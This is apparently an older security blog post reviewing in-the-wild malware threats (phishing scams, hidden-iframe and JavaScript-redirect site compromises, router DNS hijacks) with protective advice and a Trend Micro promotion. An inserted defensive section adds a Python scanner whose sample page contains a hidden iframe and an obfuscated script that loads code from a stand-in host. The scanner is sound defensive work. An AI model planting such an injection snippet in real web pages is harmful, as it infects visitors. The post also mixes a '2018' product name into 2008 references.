Current Malware Threats In The Wild
All of the above-mentioned malware types are threats to anybody running a Windows-based operating system, especially when it is connected to the Internet. There are malware threats specifically targeted at other operating systems, like Macintosh and Linux, but they are less prevalent, mostly due to the smaller installed base of those OSes. Some come to you over the wires, so to speak, via TCP/IP attacks against open "ports." A router between you and your external broadband modem can stop those attack vectors (unless you have poked holes in the router's firewall). However, no common router has the means of protecting you against malware threats that come in as you read email or use your Internet browser. Unless you have an advanced router that receives regular updates to its malware detections, you will need to keep a software firewall running on your computer to protect it against hostile incoming TCP threats.
Malware threats do not just come from the Internet. I got into computer troubleshooting before I was connected to the Internet, due to an infected floppy disk. Floppies are mostly gone nowadays, but there are still some CD's, DVD's and plug-in memory devices that are somehow infected before going to, or during production. Then, you have certain music companies who knowingly install programs onto their CD's, which install rootkits onto the computers of legitimate buyers, to prevent copying those CD's (DRM protection). This was done a couple of years ago by Sony-BMG. Those DRM rootkits were then exploited by cyber-criminals to install other, much more dangerous types of malware.
Every week or two there seems to be a new type of malware attack method discovered, as well as constant variations of existing methods of infection. This article will review the latest methods of delivering viruses, spyware, rootkits, backdoors, keyloggers and Trojans to your PC. All of the threats listed are already "in the wild." Most of them are being used to draft unprotected or insufficiently secured Windows PCs into botnets. Others are used to steal login information for website control panels, servers, banks, eBay, PayPal, or similar institutions. Then there are the pop-up ad windows that can render a computer unusable, and rogue anti-spyware programs that trick you into paying to remove threats that the program itself invented or installed. Your best defense against all of these threats is to keep a firewall running at all times, keep the most current version of your anti-virus and anti-spyware programs working and updated, and keep fully current with Windows or Macintosh security patches and updates (yes, Apple releases security patches too).
The most prevalent malware threats in the wild include the following (The Dirty Dozen):
- Lunar eclipse video scam - link leads to Trojan and Botnetting if clicked
- IRS rebates and refunds phishing scams - targets US citizens by mail or phone
- Bank Of America phishing scam
- Hillary Clinton video download scam - link downloads a Trojan if clicked
- Britney Spears and Paris Hilton video scams - link downloads a Trojan if clicked
- Storm Trojan numeric links in spam emails continue, but are reduced.
- Thousands of compromised web servers are still allowing JavaScript redirection exploits to occur, leading to stealth download infection attacks against many visitors of the web sites hosted on those servers.
- Compromised individual web sites have had hidden iframes installed, by criminal hackers, leading to instant infection of insufficiently secured PC's visiting those web sites.
- Adobe Reader had a vulnerability that, if exploited, allowed complete computer takeover. Everybody using Adobe Reader or Acrobat should be sure they update to the latest, patched version. Use the program's Help menu to check for updates and install them.
- Apple QuickTime exploits are in the wild. Make sure you update to the current version.
- There are Java virtual machine exploits on compromised web pages. Make sure your computer has the latest version of Sun's Java.
- Finally, rounding out the Dirty Dozen, certain brands of wired and wireless routers are being targeted with DNS redirect attacks. Simply opening a hostile spam email message sends code to the targeted router, which reprograms the router to send users to a phishing banking website, or the site of another financial institution, when you try to log on to that institution. Router exploits that are in the wild were recently successful against millions of Mexican DSL routers, many of whose owners used the bank that the redirect was aimed at. All of these router attacks depended on the users not setting a personal Administrator password! Those with a password were not affected.
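As an added, defender-side example that is not part of the original post: a small Python scanner that flags the two compromise patterns described above for hijacked web sites, hidden or zero-size iframes and inline scripts that decode and write out further script tags. The sample page and every URL in it are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not from any real site) carrying a zero-size hidden
# iframe and an inline script that unescapes and writes a second script tag,
# next to a legitimate, visible video embed that should not be flagged.
SAMPLE_HTML = """<html><body><h1>Welcome</h1>
<iframe src="http://example.invalid/in.cgi?3" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript src="http://example.invalid/x.js"%3E%3C/script%3E'))</script>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
</body></html>"""

HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
SUSPICIOUS_JS = re.compile(r"unescape\s*\(|eval\s*\(", re.I)


class InjectionFinder(HTMLParser):
    """Collects indicators of an injected page: tiny/hidden iframes and
    inline scripts that decode and emit more script."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            tiny = a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1")
            hidden = bool(HIDDEN_STYLE.search(a.get("style", "")))
            if tiny or hidden:
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data as raw text.
        if self._in_script and SUSPICIOUS_JS.search(data):
            self.findings.append(("obfuscated-script", data.strip()[:60]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def scan_html(html):
    """Return a list of (kind, detail) findings for the given page source."""
    parser = InjectionFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

Run it against your own site's pages (e.g. fetched with a scheduled job) to notice injected content soon after a server compromise; a legitimate visible embed produces no finding.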
What you can do to protect your PC and your identity
If you have a Mac OS PC, make sure you check for updates at least once a month, or turn on automatic checking for security updates. Mac's "Finder" has a link to check for Apple Updates. If you have iTunes installed, it may need updates occasionally as well.
If you have a Windows PC, the quickest method you can use to check your security level is to visit the security website Secunia.com and run their online Secunia Software Inspector (requires Java). After you read the instructions and click on Start, a second page will load; click on Start on that page and it will scan your PC for vulnerable software in its database, and for missing Windows Updates. If the Software Inspector finds outdated versions of software, it will highlight them with a red mark and expand their details to tell you what vulnerability exists. It will also provide a direct link to the applicable page where you can download the patched version. Sometimes Secunia will locate an older version of Flash or Java that has been left behind after updating to the current version. It will show the locations of those still-vulnerable files, which you should manually delete or uninstall (Control Panel > Add/Remove Programs).
To protect your router from code exploits, establish a unique Administrator password (do not use the word "password"), disable remote administration and turn off UPnP. If you have a wireless router, set up the best level of encryption your receiving computers can work with. Most broadband routers come with a firewall, with configurable rules and a means of "poking holes" in them. Make sure your router's firewall is turned on and do not allow any port holes unless they are necessary for your personal or business use (e.g. file sharing, VPN, remote desktop, FTP, etc.). Routers use "NAT" to hide your personal network computers from the public Internet. This makes them a less visible target for TCP/IP exploits.
Finally, if your PC shipped with a free trial version of a security program and it has expired, and you have not paid to renew it, you had better either pay for it, pay to upgrade it, or uninstall it and get a different security program. An expired anti-virus or anti-spyware program is totally useless and its only current effect is to eat up valuable system resources! There are many fine security programs available, both in retail stores and online. I have ads for several brands on this blog and on my other web pages, all of them reputable. However, I have my eye on one in particular that seems to be pulling ahead of the others, especially in the area of intercepting website-borne malware threats. That company is Trend Micro. They have a technology, included in Trend Micro Internet Security 2008 (also known as "PC-cillin"), that analyzes the content of web pages you visit, screening them for either known hostile code or potentially hostile embedded exploits, based on heuristics. If such code is discovered, Trend Micro's web threat protection will block the harmful content while allowing safe content to be delivered. Or, it can block the entire web site from downloading anything, if you prefer. This type of defense is invaluable when you consider that much of today's malware is being delivered through website exploits and hidden redirects.
The Trend Micro Security Suite 2018 also comes with a two-way firewall, anti-virus, anti-spyware and anti-phishing protection, with multiple daily automatic updates, all for a reasonable subscription price and allowing you to protect up to three PCs under one license. Get 10% off a 1-year subscription to Trend Micro Internet Security 2008, using Coupon Code: TrendIS08.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.